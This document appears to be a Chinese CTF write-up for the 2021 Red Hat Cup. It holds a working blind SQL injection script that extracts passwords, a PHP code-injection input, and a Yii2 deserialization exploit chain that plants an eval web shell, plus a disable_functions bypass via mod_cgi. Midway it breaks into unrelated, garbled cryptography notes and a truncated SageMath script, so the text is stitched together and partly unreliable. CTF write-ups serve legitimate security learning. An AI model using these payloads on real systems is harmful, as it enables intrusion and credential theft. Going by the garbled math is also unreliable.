Category - 红帽杯2021

image.php 有sql注入

 

```

import requests
import sys
session = requests.session()
hh=''
burp0_url = "http://eci-2zeab1jn4vnk23hzs0z3.cloudeci1.ichunqiu.com:80/image.php"
for i in range(1,100):
    for j in range(30,129):
        if j==128:
            sys.exit(1)

        #print(gg)
        params={'id':"2/(select/**/ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctf'),{},1))={})".replace(' ','/**/').format(i,j)}
        params={'id':"2/(select/**/ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{},1))={})".replace(' ','/**/').format(i,j)}
        params={'id':"2/(select/**/ascii(substr((select group_concat(password)from users),{},1))={})".replace(' ','/**/').format(i,j)}

        r=session.get(burp0_url,params=params)
        a=len(r.text)
        if a>1000:
            hh+=chr(j)
            print(hh)
           break

 ```

 

得到密码登录

登录后

File:///flag 得到flag

 

robots.txt看到1ndexx.php .1ndexx.php.swp泄露

index.php?code=<?php+phpinfo();?>

然后访问hack.php得到flag


Yii2漏洞 about 路由反序列化 直接网上exp assert 写shell

```

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'assert';
            $this->id = 'file_put_contents("/var/www/html/web/a.php","<?=eval(\\$_POST[a]);?>");';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){

            $this->formatters['isRunning'] = [new CreateAction(), 'run'];
        }
    }
}

// poc2
namespace Codeception\Extension{
    use Faker\Generator;
    class RunProcess{
        private $processes;
        public function __construct()
        {
            $this->processes = [new Generator()];
        }
    }
}
namespace{
    echo base64_encode(serialize(new Codeception\Extension\RunProcess()));
}
?>

```

写shell

 

需要bypass disable_function

 

Apache mod cgi 绕过

 ```

<?php

$cmd = "/readflag > /tmp/1"; //comman

一看到还以为是小数的背包问题, 仔细想想并不是, 来看一下式子就能懂了, 先看得到密文ct的式子

ct=2256(k0m0+k1m1+k2m2+k23m23)e

这里多了个e 就是把取整直接看成减去一个小数e

kn是已知的, 而且是小数, 不能直接造格子, 但我们把2256分配给每一项就不一样了, 对于其中一项

2256km=2256lnpm=(2256lnpe)m

2256lnpi=Ai每一项都这么干, 那么整个ct就会变成

超椭圆曲线...第一次接触,但搜到了原题
https://pwnthem0le.polito.it/2020/12/20/hxpCTF-2020-Hyper-writeup/
具体原理我不是很懂也敢乱说

改一下上面链接的exp就可以了

  1. #sage
  2. import itertools
  3. import struct
  4. p = 10000000000000001119
  5. R.<x> = GF(p)[]
  6. y = x
  7. f = y + y^7
  8. C = HyperellipticCurve(f, 0)
  9. J = C.jacobian()
  10. Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]
  11. enc = bytes.fromhex('66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5')
  12. known_pt = ('a'*20+'flag').encode()
  13. rng_output = bytes(e^^m for e,m in zip(enc, known_pt))
  14. blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
  15. ui = [int.from_bytes(r, 'little') for r in blocks]
  16. u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]
  17. L = GF(p).algebraic_closure()
  18. FL = True
  19. while FL:
  20. roots = [r[0] for r in u.change_ring(L).roots()]
  21. RR.<zz> = PolynomialRing(L)
  22. v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
  23. vi = [v.coefficients()[i].as_finite_f